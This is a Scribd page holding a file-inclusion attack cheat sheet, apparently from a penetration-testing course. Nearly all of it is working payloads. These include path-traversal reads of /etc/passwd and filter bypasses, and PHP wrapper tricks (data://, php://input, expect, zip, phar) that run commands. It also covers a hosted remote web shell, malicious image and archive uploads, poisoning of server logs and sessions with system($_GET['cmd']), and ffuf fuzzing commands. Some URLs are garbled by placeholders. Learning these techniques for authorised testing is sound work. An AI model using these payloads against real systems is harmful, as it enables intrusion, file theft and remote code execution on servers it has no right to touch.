Scribd
Upload
264 views5 pages

File Inclusion Module Cheat Sheet

Uploaded by

antoniodejesus0006
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
264 views5 pages

File Inclusion Module Cheat Sheet

Uploaded by

antoniodejesus0006
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

FILE INCLUSION

CHEAT SHEET
Local File Inclusion

Command Description

Basic LFI

/[Link]?language=/etc/passwd Basic LFI

/[Link]?language=../../../../etc/passwd LFI with path traversal

/[Link]?language=/../../../etc/passwd LFI with name prefix

/[Link]?language=./languages/../../../../etc/passwd LFI with approved path

LFI Bypasses

/[Link]?language=....//....//....//....//etc/passwd Bypass basic path traversal


filter

/[Link]? Bypass filters with URL


language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 encoding

/[Link]?language=non_existing_directory/../../../etc/passwd/./././.[./ Bypass appended extension


REPEATED ~2048 times] with path truncation
(obsolete)

/[Link]?language=../../../../etc/passwd%00 Bypass appended extension


with null byte (obsolete)

/[Link]?language=php://filter/read=convert.base64- Read PHP with base64 filter


encode/resource=config
Remote Code Execution

Command Description

PHP Wrappers

/[Link]? RCE with


language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id data
wrapper

curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "[Link] RCE with


<PORT>/[Link]?language=php://input&cmd=id" input
wrapper

curl -s "[Link] RCE with


expect
wrapper

RFI

echo '<?php system($_GET["cmd"]); ?>' > [Link] && python3 -m [Link] Host web
<LISTENING_PORT> shell

/[Link]?language=[Link] Include
remote PHP
web shell

LFI + Upload

echo 'GIF8<?php system($_GET["cmd"]); ?>' > [Link] Create


malicious
image

/[Link]?language=./profile_images/[Link]&cmd=id RCE with


malicious
uploaded
image

echo '<?php system($_GET["cmd"]); ?>' > [Link] && zip [Link] [Link] Create
malicious
zip archive
'as jpg'
Command Description

/[Link]?language=zip://[Link]%[Link]&cmd=id RCE with


malicious
uploaded
zip

php --define [Link]=0 [Link] && mv [Link] [Link] Create


malicious
phar 'as jpg'

/[Link]?language=phar://./profile_images/[Link]%[Link]&cmd=id RCE with


malicious
uploaded
phar

Log Poisoning

/[Link]?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd Read PHP


session
parameters

/[Link]?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E Poison PHP


session with
web shell

/[Link]?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id RCE
through
poisoned
PHP
session

curl -s "[Link] -A '<?php system($_GET["cmd"]); ?>' Poison


server log

/[Link]?language=/var/log/apache2/[Link]&cmd=id RCE
through
poisoned
PHP
session

Misc

Command Description
Command Description

ffuf -w /opt/useful/SecLists/Discovery/Web-Content/[Link]:FUZZ -u Fuzz page


'[Link] -fs 2287 parameters

ffuf -w /opt/useful/SecLists/Fuzzing/LFI/[Link]:FUZZ -u '[Link] Fuzz LFI


<PORT>/[Link]?language=FUZZ' -fs 2287 payloads

ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory- Fuzz webroot


[Link]:FUZZ -u '[Link] path
language=../../../../FUZZ/[Link]' -fs 2287

ffuf -w ./LFI-WordList-Linux:FUZZ -u '[Link] Fuzz server


language=../../../../FUZZ' -fs 2287 configurations

LFI Wordlists

[Link]

Webroot path wordlist for Linux

Webroot path wordlist for Windows

Server configurations wordlist for Linux

Server configurations wordlist for Windows

File Inclusion Functions

Function Read Content Execute Remote URL

PHP

include()/include_once()

require()/require_once()

file_get_contents()

fopen()/file()

NodeJS
Function Read Content Execute Remote URL

[Link]()

[Link]()

[Link]()

Java

include

import

.NET

@[Link]()

@[Link]()

[Link]()

include

You might also like